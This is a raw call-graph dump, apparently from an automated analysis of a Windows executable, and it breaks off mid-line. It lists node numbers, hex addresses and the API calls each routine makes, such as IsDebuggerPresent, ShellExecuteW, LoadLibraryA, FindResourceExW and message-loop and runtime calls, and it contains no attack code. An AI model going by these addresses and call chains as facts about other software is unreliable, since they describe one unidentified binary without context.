92869->92855 92870->92839 92871->92868 92872->92758 92873->92765 92874->92776 92876 606e2b 92875->92876 92881 606cb5 92876->92881 92880 606e46 92880->92779 92882 606ccf _memset ___raise_securityfailure 92881->92882 92883 606cef IsDebuggerPresent 92882->92883 92889 6081ac SetUnhandledExceptionFilter UnhandledExceptionFilter 92883->92889 92886 606db3 ___raise_securityfailure 92890 60a70c 92886->92890 92887 606dd6 92888 608197 GetCurrentProcess TerminateProcess 92887->92888 92888->92880 92889->92886 92891 60a714 92890->92891 92892 60a716 IsProcessorFeaturePresent 92890->92892 92891->92887 92894 6137b0 92892->92894 92897 61375f 5 API calls ___raise_securityfailure 92894->92897 92896 613893 92896->92887 92897->92896 92898->92783 92900 607cf4 __lock 47 API calls 92899->92900 92901 601410 92900->92901 92964 607e58 LeaveCriticalSection 92901->92964 92903 5e3a88 92904 60146d 92903->92904 92905 601491 92904->92905 92906 601477 92904->92906 92905->92791 92906->92905 92965 607c0e 47 API calls __getptd_noexit 92906->92965 92908 601481 92966 606e10 8 API calls __cftog_l 92908->92966 92910 60148c 92910->92791 92911->92793 92913 5e3d26 __ftell_nolock 92912->92913 92914 5ed7f7 48 API calls 92913->92914 92915 5e3d31 GetCurrentDirectoryW 92914->92915 92967 5e61ca 92915->92967 92917 5e3d57 IsDebuggerPresent 92918 651cc1 MessageBoxA 92917->92918 92919 5e3d65 92917->92919 92920 651cd9 92918->92920 92919->92920 92921 5e3d82 92919->92921 92950 5e3e3a 92919->92950 93143 5fc682 48 API calls 92920->93143 93041 5e40e5 92921->93041 92922 5e3e41 SetCurrentDirectoryW 92925 5e3e4e Mailbox 92922->92925 92925->92795 92926 651ce9 92931 651cff SetCurrentDirectoryW 92926->92931 92928 5e3da0 GetFullPathNameW 92929 5e6a63 48 API calls 92928->92929 92930 5e3ddb 92929->92930 93057 5e6430 92930->93057 92931->92925 92934 5e3df6 92935 5e3e00 92934->92935 93144 6271fa AllocateAndInitializeSid CheckTokenMembership FreeSid 92934->93144 93073 5e3e6e GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 92935->93073 92938 651d1c 92938->92935 92941 651d2d 92938->92941 92943 5e5374 50 API calls 92941->92943 92942 5e3e0a 92944 5e3e1f 92942->92944 92947 5e4ffc 67 API calls 92942->92947 92946 651d35 92943->92946 93081 5ee8d0 92944->93081 92949 5ece19 48 API calls 92946->92949 92947->92944 92951 651d42 92949->92951 92950->92922 92953 651d6e 92951->92953 92954 651d49 92951->92954 92956 5e518c 48 API calls 92953->92956 92955 5e518c 48 API calls 92954->92955 92957 651d54 92955->92957 92963 651d6a GetForegroundWindow ShellExecuteW 92956->92963 92958 5e510d 48 API calls 92957->92958 92960 651d61 92958->92960 92962 5e518c 48 API calls 92960->92962 92961 651d9e Mailbox 92961->92950 92962->92963 92963->92961 92964->92903 92965->92908 92966->92910 93145 5fe99b 92967->93145 92971 5e61eb 92972 5e5374 50 API calls 92971->92972 92973 5e61ff 92972->92973 92974 5ece19 48 API calls 92973->92974 92975 5e620c 92974->92975 93162 5e39db 92975->93162 92977 5e6216 Mailbox 92978 5e6eed 48 API calls 92977->92978 92979 5e622b 92978->92979 93174 5e9048 92979->93174 92982 5ece19 48 API calls 92983 5e6244 92982->92983 93177 5ed6e9 92983->93177 92985 5e6254 Mailbox 92986 5ece19 48 API calls 92985->92986 92987 5e627c 92986->92987 92988 5ed6e9 55 API calls 92987->92988 92989 5e628f Mailbox 92988->92989 92990 5ece19 48 API calls 92989->92990 92991 5e62a0 92990->92991 93181 5ed645 92991->93181 92993 5e62b2 Mailbox 92994 5ed7f7 48 API calls 92993->92994 92995 5e62c5 92994->92995 93191 5e63fc 92995->93191 92999 5e62df 93000 5e62e9 92999->93000 93001 651c08 92999->93001 93003 600fa7 _W_store_winword 59 API calls 93000->93003 93002 5e63fc 48 API calls 93001->93002 93005 651c1c 93002->93005 93004 5e62f4 93003->93004 93004->93005 93006 5e62fe 93004->93006 93008 5e63fc 48 API calls 93005->93008 93007 600fa7 _W_store_winword 59 API calls 93006->93007 93009 5e6309 93007->93009 93010 651c38 93008->93010 93009->93010 93011 5e6313 93009->93011 93013 5e5374 50 API calls 93010->93013 93012 600fa7 _W_store_winword 59 API calls 93011->93012 93015 5e631e 93012->93015 93014 651c5d 93013->93014 93016 5e63fc 48 API calls 93014->93016 93017 5e635f 93015->93017 93019 651c86 93015->93019 93022 5e63fc 48 API calls 93015->93022 93018 651c69 93016->93018 93017->93019 93020 5e636c 93017->93020 93021 5e6eed 48 API calls 93018->93021 93023 5e6eed 48 API calls 93019->93023 93024 5fc050 48 API calls 93020->93024 93025 651c77 93021->93025 93026 5e6342 93022->93026 93027 651ca8 93023->93027 93028 5e6384 93024->93028 93029 5e63fc 48 API calls 93025->93029 93030 5e6eed 48 API calls 93026->93030 93031 5e63fc 48 API calls 93027->93031 93032 5f1b90 48 API calls 93028->93032 93029->93019 93033 5e6350 93030->93033 93034 651cb5 93031->93034 93038 5e6394 93032->93038 93035 5e63fc 48 API calls 93033->93035 93034->93034 93035->93017 93036 5f1b90 48 API calls 93036->93038 93038->93036 93039 5e63fc 48 API calls 93038->93039 93040 5e63d6 Mailbox 93038->93040 93207 5e6b68 48 API calls 93038->93207 93039->93038 93040->92917 93042 5e40f2 __ftell_nolock 93041->93042 93043 5e410b 93042->93043 93044 65370e _memset 93042->93044 93045 5e660f 49 API calls 93043->93045 93047 65372a GetOpenFileNameW 93044->93047 93046 5e4114 93045->93046 93685 5e40a7 93046->93685 93049 653779 93047->93049 93050 5e6a63 48 API calls 93049->93050 93052 65378e 93050->93052 93052->93052 93054 5e4129 93703 5e4139 93054->93703 93058 5e643d __ftell_nolock 93057->93058 93913 5e4c75 93058->93913 93060 5e6442 93072 5e3dee 93060->93072 93924 5e5928 86 API calls 93060->93924 93062 5e644f 93062->93072 93925 5e5798 88 API calls Mailbox 93062->93925 93064 5e6458 93065 5e645c GetFullPathNameW 93064->93065 93064->93072 93066 5e6a63 48 API calls 93065->93066 93067 5e6488 93066->93067 93068 5e6a63 48 API calls 93067->93068 93069 5e6495 93068->93069 93070 655dcf _wcscat 93069->93070 93071 5e6a63 48 API calls 93069->93071 93071->93072 93072->92926 93072->92934 93074 5e3ed8 93073->93074 93075 651cba 93073->93075 93969 5e4024 93074->93969 93079 5e3e05 93080 5e36b8 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 93079->93080 93080->92942 93082 5ee8f6 93081->93082 93101 5ee906 Mailbox 93081->93101 93083 5eed52 93082->93083 93082->93101 94061 5fe3cd 335 API calls 93083->94061 93085 5e3e2a 93085->92950 93142 5e3847 Shell_NotifyIconW _memset 93085->93142 93087 5eed63 93087->93085 93088 5eed70 93087->93088 94063 5fe312 335 API calls Mailbox 93088->94063 93089 5ee94c PeekMessageW 93089->93101 93090 65526e Sleep 93090->93101 93092 5eed77 LockWindowUpdate DestroyWindow GetMessageW 93092->93085 93095 5eeda9 93092->93095 93093 5eebc7 93093->93085 94062 5e2ff6 16 API calls 93093->94062 93097 6559ef TranslateMessage DispatchMessageW GetMessageW 93095->93097 93097->93097 93098 655a1f 93097->93098 93098->93085 93099 5eebf7 timeGetTime 93099->93101 93100 5eed21 PeekMessageW 93100->93101 93101->93089 93101->93090 93101->93093 93101->93099 93101->93100 93103 5e6eed 48 API calls 93101->93103 93104 655557 WaitForSingleObject 93101->93104 93105 5ff4ea 48 API calls 93101->93105 93106 655429 Mailbox 93101->93106 93107 65588f Sleep 93101->93107 93109 5eed3a TranslateMessage DispatchMessageW 93101->93109 93111 5eedae timeGetTime 93101->93111 93113 655733 Sleep 93101->93113 93119 5e2aae 311 API calls 93101->93119 93122 655445 Sleep 93101->93122 93128 5e1caa 49 API calls 93101->93128 93134 5efe30 311 API calls 93101->93134 93138 62cc5c 86 API calls 93101->93138 93140 5ed6e9 55 API calls 93101->93140 93141 5ece19 48 API calls 93101->93141 93974 5ef110 93101->93974 94039 5f45e0 93101->94039 94056 5eeed0 335 API calls Mailbox 93101->94056 94057 5eef00 335 API calls 93101->94057 94058 5f3200 335 API calls 2 library calls 93101->94058 94059 5fe244 TranslateAcceleratorW 93101->94059 94060 5fdc5f IsDialogMessageW GetClassLongW 93101->94060 94065 648d23 48 API calls 93101->94065 93103->93101 93104->93101 93108 655574 GetExitCodeProcess CloseHandle 93104->93108 93105->93101 93106->93101 93110 5ed7f7 48 API calls 93106->93110 93116 5fdc38 timeGetTime 93106->93116 93117 655926 GetExitCodeProcess 93106->93117 93106->93122 93124 655432 Sleep 93106->93124 93125 648c4b 108 API calls 93106->93125 93126 5e2c79 107 API calls 93106->93126 93127 6559ae Sleep 93106->93127 93129 5ece19 48 API calls 93106->93129 93133 5ed6e9 55 API calls 93106->93133 94066 624cbe 49 API calls Mailbox 93106->94066 94067 5e1caa 49 API calls 93106->94067 94068 5e2aae 335 API calls 93106->94068 94069 63ccb2 50 API calls 93106->94069 94070 627a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 93106->94070 94071 626532 63 API calls 3 library calls 93106->94071 93107->93106 93108->93101 93109->93100 93110->93106 94064 5e1caa 49 API calls 93111->94064 93113->93106 93116->93106 93120 655952 CloseHandle 93117->93120 93121 65593c WaitForSingleObject 93117->93121 93119->93101 93120->93106 93121->93101 93121->93120 93122->93101 93124->93122 93125->93106 93126->93106 93127->93101 93128->93101 93129->93106 93133->93106 93134->93101 93138->93101 93140->93101 93141->93101 93142->92950 93143->92926 93144->92938 93146 5ed7f7 48 API calls 93145->93146 93147 5e61db 93146->93147 93148 5e6009 93147->93148 93149 5e6016 __ftell_nolock 93148->93149 93150 5e6a63 48 API calls 93149->93150 93155 5e617c Mailbox 93149->93155 93152 5e6048 93150->93152 93160 5e607e Mailbox 93152->93160 93208 5e61a6 93152->93208 93153 5e61a6 48 API calls 93153->93160 93154 5e614f 93154->93155 93156 5ece19 48 API calls 93154->93156 93155->92971 93158 5e6170 93156->93158 93157 5ece19 48 API calls 93157->93160 93159 5e64cf 48 API calls 93158->93159 93159->93155 93160->93153 93160->93154 93160->93155 93160->93157 93161 5e64cf 48 API calls 93160->93161 93161->93160 93211 5e41a9 93162->93211 93165 5e3a06 93165->92977 93168 652ff0 93170 601c9d _free 47 API calls 93168->93170 93171 652ffd 93170->93171 93172 5e4252 84 API calls 93171->93172 93173 653006 93172->93173 93173->93173 93175 5ff4ea 48 API calls 93174->93175 93176 5e6237 93175->93176 93176->92982 93178 5ed6f4 93177->93178 93179 5ed71b 93178->93179 93678 5ed764 55 API calls 93178->93678 93179->92985 93182 5ed654 93181->93182 93189 5ed67e 93181->93189 93183 5ed65b 93182->93183 93185 5ed6c2 93182->93185 93184 5ed666 93183->93184 93190 5ed6ab 93183->93190 93679 5ed9a0 53 API calls __cinit 93184->93679 93185->93190 93681 5fdce0 53 API calls 93185->93681 93189->92993 93190->93189 93680 5fdce0 53 API calls 93190->93680 93192 5e641f 93191->93192 93193 5e6406 93191->93193 93195 5e6a63 48 API calls 93192->93195 93194 5e6eed 48 API calls 93193->93194 93196 5e62d1 93194->93196 93195->93196 93197 600fa7 93196->93197 93198 600fb3 93197->93198 93199 601028 93197->93199 93206 600fd8 93198->93206 93682 607c0e 47 API calls __getptd_noexit 93198->93682 93684 60103a 59 API calls 3 library calls 93199->93684 93202 601035 93202->92999 93203 600fbf 93683 606e10 8 API calls __cftog_l 93203->93683 93205 600fca 93205->92999 93206->92999 93207->93038 93209 5ebdfa 48 API calls 93208->93209 93210 5e61b1 93209->93210 93210->93152 93276 5e4214 93211->93276 93216 654f73 93219 5e4252 84 API calls 93216->93219 93217 5e41d4 LoadLibraryExW 93286 5e4291 93217->93286 93221 654f7a 93219->93221 93223 5e4291 3 API calls 93221->93223 93225 654f82 93223->93225 93224 5e41fb 93224->93225 93226 5e4207 93224->93226 93312 5e44ed 93225->93312 93228 5e4252 84 API calls 93226->93228 93230 5e39fe 93228->93230 93230->93165 93235 62c396 93230->93235 93232 654fa9 93320 5e4950 93232->93320 93234 654fb6 93236 5e4517 83 API calls 93235->93236 93237 62c405 93236->93237 93498 62c56d 93237->93498 93240 5e44ed 64 API calls 93241 62c432 93240->93241 93242 5e44ed 64 API calls 93241->93242 93243 62c442 93242->93243 93244 5e44ed 64 API calls 93243->93244 93245 62c45d 93244->93245 93246 5e44ed 64 API calls 93245->93246 93247 62c478 93246->93247 93248 5e4517 83 API calls 93247->93248 93249 62c48f 93248->93249 93250 60395c __malloc_crt 47 API calls 93249->93250 93251 62c496 93250->93251 93252 60395c __malloc_crt 47 API calls 93251->93252 93253 62c4a0 93252->93253 93254 5e44ed 64 API calls 93253->93254 93255 62c4b4 93254->93255 93256 62bf5a GetSystemTimeAsFileTime 93255->93256 93257 62c4c7 93256->93257 93258 62c4f1 93257->93258 93259 62c4dc 93257->93259 93261 62c556 93258->93261 93262 62c4f7 93258->93262 93260 601c9d _free 47 API calls 93259->93260 93263 62c4e2 93260->93263 93265 601c9d _free 47 API calls 93261->93265 93504 62b965 93262->93504 93266 601c9d _free 47 API calls 93263->93266 93268 62c41b 93265->93268 93266->93268 93268->93168 93270 5e4252 93268->93270 93269 601c9d _free 47 API calls 93269->93268 93271 5e425c 93270->93271 93275 5e4263 93270->93275 93272 6035e4 __fcloseall 83 API calls 93271->93272 93272->93275 93273 5e4272 93273->93168 93274 5e4283 FreeLibrary 93274->93273 93275->93273 93275->93274 93325 5e4339 93276->93325 93279 5e423c 93281 5e41bb 93279->93281 93282 5e4244 FreeLibrary 93279->93282 93283 603499 93281->93283 93282->93281 93333 6034ae 93283->93333 93285 5e41c8 93285->93216 93285->93217 93412 5e42e4 93286->93412 93289 5e42b8 93291 5e41ec 93289->93291 93292 5e42c1 FreeLibrary 93289->93292 93293 5e4380 93291->93293 93292->93291 93294 5ff4ea 48 API calls 93293->93294 93295 5e4395 93294->93295 93296 5e47b7 48 API calls 93295->93296 93297 5e43a1 ___crtGetEnvironmentStringsW 93296->93297 93298 5e43dc 93297->93298 93299 5e4499 93297->93299 93300 5e44d1 93297->93300 93301 5e4950 57 API calls 93298->93301 93420 5e406b CreateStreamOnHGlobal 93299->93420 93431 62c750 93 API calls 93300->93431 93309 5e43e5 93301->93309 93304 5e44ed 64 API calls 93304->93309 93305 5e4479 93305->93224 93307 654ed7 93308 5e4517 83 API calls 93307->93308 93310 654eeb 93308->93310 93309->93304 93309->93305 93309->93307 93426 5e4517 93309->93426 93311 5e44ed 64 API calls 93310->93311 93311->93305 93313 5e44ff 93312->93313 93316 654fc0 93312->93316 93455 60381e 93313->93455 93317 62bf5a 93475 62bdb4 93317->93475 93319 62bf70 93319->93232 93321 5e495f 93320->93321 93322 655002 93320->93322 93480 603e65 93321->93480 93324 5e4967 93324->93234 93329 5e434b 93325->93329 93328 5e4321 LoadLibraryA GetProcAddress 93328->93279 93330 5e422f 93329->93330 93331 5e4354 LoadLibraryA 93329->93331 93330->93279 93330->93328 93331->93330 93332 5e4365 GetProcAddress 93331->93332 93332->93330 93336 6034ba _flsall 93333->93336 93334 6034cd 93381 607c0e 47 API calls __getptd_noexit 93334->93381 93336->93334 93338 6034fe 93336->93338 93337 6034d2 93382 606e10 8 API calls __cftog_l 93337->93382 93352 60e4c8 93338->93352 93341 603503 93342 603519 93341->93342 93343 60350c 93341->93343 93344 603543 93342->93344 93345 603523 93342->93345 93383 607c0e 47 API calls __getptd_noexit 93343->93383 93366 60e5e0 93344->93366 93384 607c0e 47 API calls __getptd_noexit 93345->93384 93349 6034dd _flsall @_EH4_CallFilterFunc@8 93349->93285 93353 60e4d4 _flsall 93352->93353 93354 607cf4 __lock 47 API calls 93353->93354 93355 60e4e2 93354->93355 93356 60e559 93355->93356 93362 607d7c __mtinitlocknum 47 API calls 93355->93362 93364 60e552 93355->93364 93389 604e5b 48 API calls __lock 93355->93389 93390 604ec5 LeaveCriticalSection LeaveCriticalSection _doexit 93355->93390 93391 6069d0 47 API calls __malloc_crt 93356->93391 93359 60e560 93361 60e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 93359->93361 93359->93364 93360 60e5cc _flsall 93360->93341 93361->93364 93362->93355 93386 60e5d7 93364->93386 93375 60e600 __wopenfile 93366->93375 93367 60e61a 93396 607c0e 47 API calls __getptd_noexit 93367->93396 93368 60e7d5 93368->93367 93372 60e838 93368->93372 93370 60e61f 93397 606e10 8 API calls __cftog_l 93370->93397 93393 6163c9 93372->93393 93373 60354e 93385 603570 LeaveCriticalSection LeaveCriticalSection _fseek 93373->93385 93375->93367 93375->93368 93398 60185b 59 API calls 2 library calls 93375->93398 93377 60e7ce 93377->93368 93399 60185b 59 API calls 2 library calls 93377->93399 93379 60e7ed 93379->93368 93400 60185b 59 API calls 2 library calls 93379->93400 93381->93337 93382->93349 93383->93349 93384->93349 93385->93349 93392 607e58 LeaveCriticalSection 93386->93392 93388 60e5de 93388->93360 93389->93355 93390->93355 93391->93359 93392->93388 93401 615bb1 93393->93401 93395 6163e2 93395->93373 93396->93370 93397->93373 93398->93377 93399->93379 93400->93368 93404 615bbd _flsall 93401->93404 93402 615bcf 93403 607c0e __cftog_l 47 API calls 93402->93403 93405 615bd4 93403->93405 93404->93402 93406 615c06 93404->93406 93407 606e10 __cftog_l 8 API calls 93405->93407 93408 615c78 __wsopen_helper 110 API calls 93406->93408 93411 615bde _flsall 93407->93411 93409 615c23 93408->93409 93410 615c4c __wsopen_helper LeaveCriticalSection 93409->93410 93410->93411 93411->93395 93416 5e42f6 93412->93416 93415 5e42cc LoadLibraryA GetProcAddress 93415->93289 93417 5e42aa 93416->93417 93418 5e42ff LoadLibraryA 93416->93418 93417->93289 93417->93415 93418->93417 93419 5e4310 GetProcAddress 93418->93419 93419->93417 93421 5e4085 FindResourceExW 93420->93421 93425 5e40a2 93420->93425 93422 654f16 LoadResource 93421->93422 93421->93425 93423 654f2b SizeofResource 93422->93423 93422->93425 93424 654f3f LockResource 93423->93424 93423->93425 93424->93425 93425->93298 93427 5e4526 93426->93427 93430 654fe0 93426->93430 93432 603a8d 93427->93432 93429 5e4534 93429->93309 93431->93298 93434 603a99 _flsall 93432->93434 93433 603aa7 93445 607c0e 47 API calls __getptd_noexit 93433->93445 93434->93433 93435 603acd 93434->93435 93447 604e1c 93435->93447 93438 603aac 93446 606e10 8 API calls __cftog_l 93438->93446 93439 603ad3 93453 6039fe 81 API calls 4 library calls 93439->93453 93442 603ab7 _flsall 93442->93429 93443 603ae2 93454 603b04 LeaveCriticalSection LeaveCriticalSection _fseek 93443->93454 93445->93438 93446->93442 93448 604e2c 93447->93448 93449 604e4e EnterCriticalSection 93447->93449 93448->93449 93450 604e34 93448->93450 93451 604e44 93449->93451 93452 607cf4 __lock 47 API calls 93450->93452 93451->93439 93452->93451 93453->93443 93454->93442 93458 603839 93455->93458 93457 5e4510 93457->93317 93459 603845 _flsall 93458->93459 93460 603888 93459->93460 93461 603880 _flsall 93459->93461 93463 60385b _memset 93459->93463 93462 604e1c __lock_file 48 API calls 93460->93462 93461->93457 93465 60388e 93462->93465 93471 607c0e 47 API calls __getptd_noexit 93463->93471 93473 60365b 62 API calls 6 library calls 93465->93473 93466 603875 93472 606e10 8 API calls __cftog_l 93466->93472 93469 6038a4 93474 6038c2 LeaveCriticalSection LeaveCriticalSection _fseek 93469->93474 93471->93466 93472->93461 93473->93469 93474->93461 93478 60344a GetSystemTimeAsFileTime 93475->93478 93477 62bdc3 93477->93319 93479 603478 __aulldiv 93478->93479 93479->93477 93481 603e71 _flsall 93480->93481 93482 603e94 93481->93482 93483 603e7f 93481->93483 93485 604e1c __lock_file 48 API calls 93482->93485 93494 607c0e 47 API calls __getptd_noexit 93483->93494 93487 603e9a 93485->93487 93486 603e84 93495 606e10 8 API calls __cftog_l 93486->93495 93496 603b0c 55 API calls 4 library calls 93487->93496 93490 603ea5 93497 603ec5 LeaveCriticalSection LeaveCriticalSection _fseek 93490->93497 93492 603e8f _flsall 93492->93324 93493 603eb7 93493->93492 93494->93486 93495->93492 93496->93490 93497->93493 93502 62c581 __tzset_nolock _wcscmp 93498->93502 93499 5e44ed 64 API calls 93499->93502 93500 62bf5a GetSystemTimeAsFileTime 93500->93502 93501 62c417 93501->93240 93501->93268 93502->93499 93502->93500 93502->93501 93503 5e4517 83 API calls 93502->93503 93503->93502 93505 62b970 93504->93505 93506 62b97e 93504->93506 93507 603499 117 API calls 93505->93507 93508 62b9c3 93506->93508 93509 603499 117 API calls 93506->93509 93518 62b987 93506->93518 93507->93506 93535 62bbe8 64 API calls 3 library calls 93508->93535 93511 62b9a8 93509->93511 93511->93508 93513 62b9b1 93511->93513 93512 62ba07 93514 62ba0b 93512->93514 93515 62ba2c 93512->93515 93513->93518 93546 6035e4 93513->93546 93520 6035e4 __fcloseall 83 API calls 93514->93520 93523 62ba18 93514->93523 93536 62b7e5 47 API calls __malloc_crt 93515->93536 93518->93269 93519 62ba34 93521 62ba5a 93519->93521 93522 62ba3a 93519->93522 93520->93523 93537 62ba8a 90 API calls 93521->93537 93525 62ba47 93522->93525 93527 6035e4 __fcloseall 83 API calls 93522->93527 93523->93518 93524 6035e4 __fcloseall 83 API calls 93523->93524 93524->93518 93525->93518 93529 6035e4 __fcloseall 83 API calls 93525->93529 93527->93525 93528 62ba61 93538 62bb64 93528->93538 93529->93518 93532 62ba75 93532->93518 93534 6035e4 __fcloseall 83 API calls 93532->93534 93533 6035e4 __fcloseall 83 API calls 93533->93532 93534->93518 93535->93512 93536->93519 93537->93528 93539 62bb71 93538->93539 93540 62bb77 93538->93540 93541 601c9d _free 47 API calls 93539->93541 93542 62bb88 93540->93542 93543 601c9d _free 47 API calls 93540->93543 93541->93540 93544 62ba68 93542->93544 93545 601c9d _free 47 API calls 93542->93545 93543->93542 93544->93532 93544->93533 93545->93544 93547 6035f0 _flsall 93546->93547 93548 603604 93547->93548 93549 60361c 93547->93549 93575 607c0e 47 API calls __getptd_noexit 93548->93575 93551 604e1c __lock_file 48 API calls 93549->93551 93553 603614 _flsall 93549->93553 93554 60362e 93551->93554 93552 603609 93576 606e10 8 API calls __cftog_l 93552->93576 93553->93518 93559 603578 93554->93559 93560 603587 93559->93560 93561 60359b 93559->93561 93618 607c0e 47 API calls __getptd_noexit 93560->93618 93562 603597 93561->93562 93578 602c84 93561->93578 93577 603653 LeaveCriticalSection LeaveCriticalSection _fseek 93562->93577 93565 60358c 93619 606e10 8 API calls __cftog_l 93565->93619 93571 6035b5 93595 60e9d2 93571->93595 93573 6035bb 93573->93562 93574 601c9d _free 47 API calls 93573->93574 93574->93562 93575->93552 93576->93553 93577->93553 93579 602c97 93578->93579 93583 602cbb 93578->93583 93580 602933 __fclose_nolock 47 API calls 93579->93580 93579->93583 93581 602cb4 93580->93581 93620 60af61 93581->93620 93584 60eb36 93583->93584 93585 6035af 93584->93585 93586 60eb43 93584->93586 93588 602933 93585->93588 93586->93585 93587 601c9d _free 47 API calls 93586->93587 93587->93585 93589 602952 93588->93589 93590 60293d 93588->93590 93589->93571 93645 607c0e 47 API calls __getptd_noexit 93590->93645 93592 602942 93646 606e10 8 API calls __cftog_l 93592->93646 93594 60294d 93594->93571 93596 60e9de _flsall 93595->93596 93597 60e9e6 93596->93597 93601 60e9fe 93596->93601 93671 607bda 47 API calls __getptd_noexit 93597->93671 93598 60ea7b 93675 607bda 47 API calls __getptd_noexit 93598->93675 93601->93598 93604 60ea28 93601->93604 93602 60e9eb 93672 607c0e 47 API calls __getptd_noexit 93602->93672 93603 60ea80 93676 607c0e 47 API calls __getptd_noexit 93603->93676 93647 60a8ed 93604->93647 93608 60ea88 93677 606e10 8 API calls __cftog_l 93608->93677 93609 60ea2e 93611 60ea41 93609->93611 93612 60ea4c 93609->93612 93656 60ea9c 93611->93656 93673 607c0e 47 API calls __getptd_noexit 93612->93673 93613 60e9f3 _flsall 93613->93573 93616 60ea47 93674 60ea73 LeaveCriticalSection __unlock_fhandle 93616->93674 93618->93565 93619->93562 93621 60af6d _flsall 93620->93621 93622 60af75 93621->93622 93626 60af8d 93621->93626 93624 607bda __lseeki64 47 API calls 93622->93624 93623 60b022 93625 607bda __lseeki64 47 API calls 93623->93625 93627 60af7a 93624->93627 93629 60b027 93625->93629 93626->93623 93630 60afbf 93626->93630 93628 607c0e __cftog_l 47 API calls 93627->93628 93639 60af82 _flsall 93628->93639 93631 607c0e __cftog_l 47 API calls 93629->93631 93632 60a8ed ___lock_fhandle 49 API calls 93630->93632 93633 60b02f 93631->93633 93634 60afc5 93632->93634 93635 606e10 __cftog_l 8 API calls 93633->93635 93636 60afd8 93634->93636 93637 60afeb 93634->93637 93635->93639 93638 60b043 __chsize_nolock 75 API calls 93636->93638 93640 607c0e __cftog_l 47 API calls 93637->93640 93641 60afe4 93638->93641 93639->93583 93642 60aff0 93640->93642 93644 60b01a __flswbuf LeaveCriticalSection 93641->93644 93643 607bda __lseeki64 47 API calls 93642->93643 93643->93641 93644->93639 93645->93592 93646->93594 93648 60a8f9 _flsall 93647->93648 93649 60a946 EnterCriticalSection 93648->93649 93650 607cf4 __lock 47 API calls 93648->93650 93651 60a96c _flsall 93649->93651 93652 60a91d 93650->93652 93651->93609 93653 60a928 InitializeCriticalSectionAndSpinCount 93652->93653 93654 60a93a 93652->93654 93653->93654 93655 60a970 ___lock_fhandle LeaveCriticalSection 93654->93655 93655->93649 93657 60aba4 __lseek_nolock 47 API calls 93656->93657 93659 60eaaa 93657->93659 93658 60eb00 93660 60ab1e __free_osfhnd 48 API calls 93658->93660 93659->93658 93661 60aba4 __lseek_nolock 47 API calls 93659->93661 93670 60eade 93659->93670 93663 60eb08 93660->93663 93664 60ead5 93661->93664 93662 60aba4 __lseek_nolock 47 API calls 93665 60eaea CloseHandle 93662->93665 93666 60eb2a 93663->93666 93669 607bed __dosmaperr 47 API calls 93663->93669 93667 60aba4 __lseek_nolock 47 API calls 93664->93667 93665->93658 93668 60eaf6 GetLastError 93665->93668 93666->93616 93667->93670 93668->93658 93669->93666 93670->93658 93670->93662 93671->93602 93672->93613 93673->93616 93674->93613 93675->93603 93676->93608 93677->93613 93678->93179 93679->93189 93680->93189 93681->93190 93682->93203 93683->93205 93684->93202 93686 60f8a0 __ftell_nolock 93685->93686 93687 5e40b4 GetLongPathNameW 93686->93687 93688 5e6a63 48 API calls 93687->93688 93689 5e40dc 93688->93689 93690 5e49a0 93689->93690 93691 5ed7f7 48 API calls 93690->93691 93692 5e49b2 93691->93692 93693 5e660f 49 API calls 93692->93693 93694 5e49bd 93693->93694 93695 652e35 93694->93695 93696 5e49c8 93694->93696 93701 652e4f 93695->93701 93743 5fd35e 60 API calls 93695->93743 93697 5e64cf 48 API calls 93696->93697 93699 5e49d4 93697->93699 93737 5e28a6 93699->93737 93702 5e49e7 Mailbox 93702->93054 93704 5e41a9 136 API calls 93703->93704 93705 5e415e 93704->93705 93706 653489 93705->93706 93707 5e41a9 136 API calls 93705->93707 93708 62c396 122 API calls 93706->93708 93709 5e4172 93707->93709 93710 65349e 93708->93710 93709->93706 93711 5e417a 93709->93711 93712 6534a2 93710->93712 93713 6534bf 93710->93713 93715 5e4186 93711->93715 93716 6534aa 93711->93716 93717 5e4252 84 API calls 93712->93717 93714 5ff4ea 48 API calls 93713->93714 93736 653504 Mailbox 93714->93736 93744 5ec833 93715->93744 93846 626b49 87 API calls _wprintf 93716->93846 93717->93716 93721 6534b8 93721->93713 93722 6536b4 93723 601c9d _free 47 API calls 93722->93723 93724 6536bc 93723->93724 93725 5e4252 84 API calls 93724->93725 93730 6536c5 93725->93730 93729 601c9d _free 47 API calls 93729->93730 93730->93729 93731 5e4252 84 API calls 93730->93731 93850 6225b5 86 API calls 4 library calls 93730->93850 93731->93730 93733 5ece19 48 API calls 93733->93736 93736->93722 93736->93730 93736->93733 93832 5eba85 93736->93832 93840 5e4dd9 93736->93840 93847 622551 48 API calls ___crtGetEnvironmentStringsW 93736->93847 93848 622472 60 API calls 2 library calls 93736->93848 93849 629c12 48 API calls 93736->93849 93738 5e28b8 93737->93738 93742 5e28d7 ___crtGetEnvironmentStringsW 93737->93742 93740 5ff4ea 48 API calls 93738->93740 93739 5ff4ea 48 API calls 93741 5e28ee 93739->93741 93740->93742 93741->93702 93742->93739 93743->93695 93745 5ec843 __ftell_nolock 93744->93745 93746 653095 93745->93746 93747 5ec860 93745->93747 93875 6225b5 86 API calls 4 library calls 93746->93875 93856 5e48ba 49 API calls 93747->93856 93750 6530a8 93876 6225b5 86 API calls 4 library calls 93750->93876 93751 5ec882 93857 5e4550 56 API calls 93751->93857 93753 5ec897 93753->93750 93754 5ec89f 93753->93754 93756 5ed7f7 48 API calls 93754->93756 93758 5ec8ab 93756->93758 93757 6530c4 93786 5ec90c 93757->93786 93858 5fe968 49 API calls __ftell_nolock 93758->93858 93760 6530d7 93763 5e4907 CloseHandle 93760->93763 93761 5ec91a 93861 601dfc 93761->93861 93762 5ec8b7 93764 5ed7f7 48 API calls 93762->93764 93766 6530e3 93763->93766 93767 5ec8c3 93764->93767 93768 5e41a9 136 API calls 93766->93768 93769 5e660f 49 API calls 93767->93769 93770 65310d 93768->93770 93771 5ec8d1 93769->93771 93773 653136 93770->93773 93776 62c396 122 API calls 93770->93776 93859 5feb66 SetFilePointerEx ReadFile 93771->93859 93772 5ec943 _wcscat _wcscpy 93775 5ec96d SetCurrentDirectoryW 93772->93775 93877 6225b5 86 API calls 4 library calls 93773->93877 93779 5ff4ea 48 API calls 93775->93779 93780 653129 93776->93780 93777 5ec8fd 93860 5e46ce SetFilePointerEx SetFilePointerEx 93777->93860 93783 5ec988 93779->93783 93784 653131 93780->93784 93785 653152 93780->93785 93782 65314d 93815 5ecad1 Mailbox 93782->93815 93787 5e47b7 48 API calls 93783->93787 93788 